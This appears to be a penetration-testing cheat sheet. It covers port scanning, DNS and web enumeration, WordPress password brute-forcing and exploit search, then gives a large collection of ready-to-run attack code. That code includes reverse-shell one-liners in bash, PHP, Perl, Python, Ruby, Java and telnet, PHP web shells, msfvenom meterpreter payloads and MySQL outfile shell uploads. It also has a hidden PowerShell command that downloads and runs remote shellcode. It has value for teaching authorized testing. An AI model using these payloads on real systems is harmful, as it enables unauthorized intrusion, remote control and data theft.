Gathering information Stage
Table of Contents
port scanning
Nmap
Network exploration tool and security/ port scanner
nmap [Scan Type] [Options] {target specification}
HOST DISCOVERY:
-sL: List Scan - simply list targets to scan
-sn/-sP: Ping Scan - disable port scan
-Pn: Treat all hosts as online -- skip host discovery
SCAN TECHNIQUES:
-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
-sU: UDP Scan -sN/sF/sX: TCP Null, FIN, and Xmas scans
PORT SPECIFICATION:
-p : Only scan specified ports
Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9
SERVICE/VERSION DETECTION:
-sV: Probe open ports to determine service/version info
OUTPUT:
-oN/-oX/-oS/-oG : Output scan in normal, XML,Output in the three major formats at once
-v: Increase verbosity level (use -vv or more for greater effect)
MISC: -6: Enable IPv6 scanning -A: Enable OS detection, version detection, script scanning, and trace
Unicornscan
A port scanner that utilizes its own userland TCP/IP stack, which allows it to run asynchronous scans. It can scan 65,535 ports in a relatively short time frame.
unicornscan [options] X.X.X.X/YY:S-E -i, --interface : interface name, like eth0 or fxp1, not normally required -m, --mode : scan mode, tcp (syn) scan is default, U for udp T for tcp \`sf' for tcp connect scan and A for arp for -mT you can also specify tcp flags following the T like -mTsFpU for example that would send tcp syn packets with (NO Syn\|FIN\|NO Push\|URG) Address ranges are in cidr notation like 1.2.3.4/8 for all of 1.?.?.?, if you omit the cidr mask /32 is implied. Port ranges are like 1-4096 with 53 only scanning one port, **a** for all 65k and p for 1-1024 example: unicornscan 192.168.1.5:1-4000 gateway:a would scan port 1 - 4000 for 192.168.1.5 and all 65K ports for the host named gateway
Netcat
Netcat might not be the best tool to use for port scanning, but it can be used quickly. While Netcat scans TCP ports by default it can perform UDP scans as well.
1.1.3 TCP Scan
For a TCP scan, the format is:
nc -vvn -z xxx.xxx.xxx.xxx startport-endport -z flag is Zero-I/O mode (used for scanning) -vv will provide verbose information about the results -n flag allows to skip the DNS lookup
1.1.4 UDP Scan
For a UDP Port Scan, we need to add the -u flag which makes the format:
nc -vvn -u -z xxx.xxx.xxx.xxx startport-endport
Amap – Application mapper
identify which services are running on a given port
amap -A 192.168.1.120 1111 amap v5.4 (www.thc.org/thc-amap) started at 2016-08-10 05:48:09 - APPLICATION MAPPING mode Protocol on 192.168.1.2:1111/tcp matches http Protocol on 192.168.1.2:1111/tcp matches http-apache-2 Protocol on 192.168.1.2:1111/tcp matches ntp Protocol on 192.168.1.2:1111/tcp matches ssl
DNS enumeration
DNS Server
If the targeted machine is running a DNS Server and we have a possible domain name, we may try to figure out A, MX, AAAA records or try zone-transfer to figure out other possible domain names.
host <domain> <optional_name_server> host -t ns <domain> — Name Servers host -t a <domain> — Address host -t aaaa <domain> — AAAA record points a domain or subdomain to an IPv6 address host -t mx <domain> — Mail Servers host -t soa <domain> — Start of Authority host <IP> — Reverse Lookup host -l <Domain Name> <DNS Server> — Domain Zone Transfer
Example:
host scanme.nmap.org scanme.nmap.org has address 45.33.32.156 scanme.nmap.org has IPv6 address 2600:3c01::f03c:91ff:fe18:bb2f.
SSL Certificate
If the targeted machine is running an https server and we are getting an apache default webpage on hitting the https://IPAddress, virtual hosts would be probably in use. Check the alt-dns-name on the ssl-certificate, create an entry in hosts file (/etc/hosts) and check what is being hosted on these domain names by surfing to https://alt-dns-name.
nmap service scan result for port 443 (sample)
| ssl-cert: Subject: commonName=examplecorp.com/organizationName=ExampleCorp Ltd./stateOrProvinceName=Attica/countryName=IN/localityName=Mumbai/organizationalUnitName=IT/emailAddress=admin@examplecorp.com | Subject Alternative Name: DNS:www.examplecorp.com, DNS:admin-portal.examplecorp.com
Scanning Structure
Google-Vulns
It is suggested that whenever you are googling something, you add words such as vulnerability, exploit, ctf, github, python, tool etc. to your search term. For example. Let’s say, you are stuck in a docker or on a specific cms search for docker ctf or <cms_name> ctf/ github etc.
Webservices
Utilize whatweb to find what software stack a server is running.
whatweb www.example.com http://www.example.com [200 OK] Cookies[ASP.NET_SessionId,CMSPreferredCulture,citrix_ns_id], Country[INDIA][IN], Email[infosecurity@zmail.example.com], Google-Analytics[Universal][UA-6386XXXXX-2], HTML5, HTTPServer[Example Webserver], HttpOnly[ASP.NET_SessionId,CMSPreferredCulture,citrix_ns_id], IP[XXX.XX.XX.208], JQuery[1.11.0], Kentico-CMS, Modernizr, Script[text/javascript], Title[Welcome to Example Website ][Title element contains newline(s)!], UncommonHeaders[cteonnt-length,x-cache-control-orig,x-expires-orig], X-Frame-Options[SAMEORIGIN], X-UA-Compatible[IE=9,IE=edge]
1.3.3 nikto
nikto – Scans a web server for known vulnerabilities.
It will examine a web server to find potential problems and security vulnerabilities, including:
- Server and software misconfigurations
- Default files and programs
- Insecure files and programs
- Outdated servers and programs
1.3.4 dirb, wfuzz, dirbuster
Furthermore, we can run the following programs to find any hidden directories.
- DIRB is a Web Content Scanner. It looks for existing (and/ or hidden) Web Objects. It basically works by launching a dictionary based attack against a web server and analyzing the response.
- wfuzz – a web application bruteforcer. Wfuzz might be useful when you are looking for a webpage of a certain size. For example: Let’s say\\, when we dirb we get 50 directories. Each directory contains an image. Often\\, we then need to figure out which image is different. In this case\\, we would figure out what’s the size of the normal image and hide that particular response with wfuzz.
- Dirbuster : DirBuster is a multi-threaded java application designed to brute force directories and files names on web/ application servers.
- gobuster : Gobuster is a tool used to brute-force URIs (directories and files) in websites and DNS subdomains (with wildcard support). (golang can be installed using apt-get).
1.3.5 BurpSuite Spider
There will be some cases when dirb/ dirbuster doesn’t find anything. This happened with us on a Node.js web application. Burpsuite’s spider helped in finding extra pages which contained the credentials.
1.3.6 PUT Method
Sometimes, it is also a good idea to check the various HTTP verbs that are available such as GET, PUT, DELETE, etc. This can be done by making an OPTIONS request. Curl can be used to check the available options (supported http verbs):
curl -X OPTIONS -v http://192.168.126.129/test/ Trying 192.168.126.129… Connected to 192.168.126.129 (192.168.126.129) port 80 (#0) > OPTIONS /test/ HTTP/1.1 > Host: 192.168.126.129 > User-Agent: curl/7.47.0 > Accept: / > < HTTP/1.1 200 OK < DAV: 1,2 < MS-Author-Via: DAV < Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK < Allow: OPTIONS, GET, HEAD, POST < Content-Length: 0 < Date: Fri, 29 Apr 2016 09:41:19 GMT < Server: lighttpd/1.4.28 < * Connection #0 to host 192.168.126.129 left intact
The PUT method allows you to upload a file which can help us to get a shell on the machine. There are multiple methods available for uploading a file with the PUT method mentioned on Detecting and exploiting the HTTP Put Method
A few are:
- Nmap:
nmap -p 80 --script http-put --script-args http-put.url='/uploads/rootme.php',http-put.file='/tmp/rootme.php'
- curl:
curl --upload-file test.txt -v --url http://192.168.126.129/test/test.txt
or
curl -X PUT -d ' curl -i -X PUT -H "Content-Type: application/xml; charset=utf-8" -d @"/tmp/some-file.xml" http://IPAddress/newpage curl -X PUT -d "text or data to put" http://IPAddress/destination_page curl -i -H "Accept: application/json" -X PUT -d "text or data to put" http://IPAddress/new_page
1.3.7 WordPress
When faced with a website that makes use of the wordpress CMS one can run wpscan. Make sure you run –enumerate u for enumerating usernames because by default wpscan doesn’t run it. Also, scan for plugins
wpsscan
--url | -u <target url> The WordPress URL/domain to scan.
--force | -f Forces WPScan to not check if the remote site is running WordPress.
--enumerate | -e [option(s)] Enumeration.
option :
u usernames from id 1 to 10
u[10-20] usernames from id 10 to 20 (you must write [] chars)
p plugins
vp only vulnerable plugins
ap all plugins (can take a long time)
tt timthumbs (vulnerability scanner)
t themes
vt only vulnerable themes
at all themes (can take a long time)
Multiple values are allowed : "-e tt,p" will enumerate timthumbs and plugins
If no option is supplied, the default is "vt,tt,u,vp"
(only vulnerable themes, timthumbs, usernames from id 1 to 10, only vulnerable plugins)
We can also use wpscan to bruteforce passwords for a given username
wpscan --url http://192.168.1.2 --wordlist wordlist.txt --username example_username
Exploit Enumeration
Secploit Terminal Search Engine
it is web tool made to make it easy to query search using tags search or with exploit name
user@secploit # search --name ubuntu
or we can search for specific vulnerability on specific software easily ,using tags support
user@secploit # search --tags cisco rce
searchsploit
Exploit Database offline Archive Search for vulnerable software , shells , papers
root@kali:~# searchsploit webmin **********Trimmed************** Description Path ---------------------------------------------------------------------------------------------------------------- Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit | /multiple/remote/1997.php Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl) | /multiple/remote/2017.pl Webmin 1.x HTML Email Command Execution Vulnerability | /cgi/webapps/24574.txt **********Trimmed**************
Once we have figured out which exploit to check we can read about it by using the file-number. For example: 1997, 2017, 24574 in the above case.
searchsploit -x 24674
Searchsploit provides an option to read the nmap XML file and suggest vulnerabilities (Requires nmap -sV -x xmlfile).
searchsploit
--nmap [file.xml] Checks all results in Nmap's XML output with service version (e.g.: nmap -sV -oX file.xml).
Use "-v" (verbose) to try even more combinationssearchsploit
Exploit Database Archive Search
First of all, we check if the operating system and/ or the exposed services are vulnerable to exploits which are already available on the internet. For example, a vulnerable service webmin is present in one of the VMs which could be exploited to extract information from the system.
root@kali:~# nmap -sV -A 172.16.73.128
**********Trimmed**************
10000/tcp open http MiniServ 0.01 (Webmin httpd)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
| ndmp-version:
|_ ERROR: Failed to get host information from server
**********Trimmed**************
If we search for webmin with searchsploit, we will find different exploits available for it and we just have to use the correct one based on utility and the matching version.
root@kali:~# searchsploit webmin
**********Trimmed**************
Description Path
----------------------------------------------------------------------------------------------------------------
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit | /multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl) | /multiple/remote/2017.pl
Webmin 1.x HTML Email Command Execution Vulnerability | /cgi/webapps/24574.txt
**********Trimmed**************
Once we have figured out which exploit to check we can read about it by using the file-number. For example: 1997, 2017, 24574 in the above case.
searchsploit -x 24674
Searchsploit provides an option to read the nmap XML file and suggest vulnerabilities (Requires nmap -sV -x xmlfile).
searchsploit
--nmap [file.xml] Checks all results in Nmap's XML output with service version (e.g.: nmap -sV -oX file.xml).
Use "-v" (verbose) to try even more combinat
Reverse Shells
PHP Web Shell
<?php system($_GET["cmd"]); ?>
or
<?php echo shell_exec($_GET["cmd"]); ?>
or
<? passthru($_GET["cmd"]); ?>
which can then be accessed by
http://IP/shell.php?cmd=id
If there’s a webpage which accepts phpcode to be executed, we can use curl to urlencode the payload and run it.
curl -G -s http://10.X.X.X/page.php?data= --data-urlencode "html=<?php passthru('ls -lah'); ?>" -b "somecookie=somevalue" | sed '/<html>/,/<\/html>/d'
- PHP Meterpreter
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f raw -o /tmp/payload.php
We can set the multi-handler in metasploit by
use exploit/multi/handler set payload php/meterpreter/reverse_tcp set LHOST yourIP run
PHP Reverse Shell
The code below assumes that the TCP connection uses file descriptor 3. This worked on my test system. If it doesn’t work, try 4 or 5 or 6.
php -r '$sock=fsockopen("192.168.1.2",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Perl
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Python
TCP
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
UDP
import os,pty,socket;s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM);s.connect(("10.10.14.17", 4445));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv("HISTFILE",'/dev/null');pty.spawn("/bin/sh");s.close()
Java
r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor()
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.129 LPORT=4444 -f war > runme.war
Bash
If a server (attacker machine) is listening on a port:
nc -lvp port
then we can use the below to connect
Method 1:
/bin/bash -i >&/dev/tcp/IP/Port 0>&1
Method 2:
exec 5<>/dev/tcp/IP/80 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; don
Method 3:
0<&196;exec 196<>/dev/tcp/IP/Port; sh <&196 >&196 2>&196 -- We may execute the above using bash -c "Aboveline "
Telnet Reverse Shell
rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443
XTerm
xterm -display 10.0.0.1:1
To catch the incoming xterm, start an X-Server:
Xnest :1 -listen tcp
You’ll need to authorize the target to connect to you (command also run on your host):
xhost +targetip
Lynx
URL to open: LYNXDOWNLOAD://Method=-1/File=/dev/null;/bin/sh;/SugFile=/dev/null
MYSQL
- If we have MYSQL Shell via sqlmap or phpmyadmin, we can use mysql outfile/ dumpfile function to upload a shell.
echo -n "<?php phpinfo(); ?>" | xxd -ps 3c3f70687020706870696e666f28293b203f3e select 0x3c3f70687020706870696e666f28293b203f3e into outfile "/var/www/html/blogblog/wp-content/uploads/phpinfo.php"
or
SELECT "<?php passthru($_GET['cmd']); ?>" into dumpfile '/var/www/html/shell.php';
- If you have sql-shell from sqlmap/ phpmyadmin, we can read files by using the load_file function.
select load_file('/etc/passwd');
Reverse Shell from Windows
Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('http://YourIPAddress:8000/Invoke-Shellcode.ps1'); Invoke-Shel
Executable Meterpreter Payloads
msfvenom -p linux/x86/meterpreter/reverse_tcp -f elf -o met LHOST=10.10.XX.110 LPORT=4446 msfvenom -p windows/x86/meterpreter/reverse_tcp -f exe LHOST=10.10.XX.110 LPORT=4446
Secploit Online reverse Shells Generator
user@secploit# shell bash 192.168.1.1 444
you can also generate any type by choosing bash or python , ruby ..etc
offensive security expert and founder of 0xsp security research and development (SRD), passionate about hacking and breaking stuff, coder and maintainer of 0xsp-mongoose RED, and many other open-source projects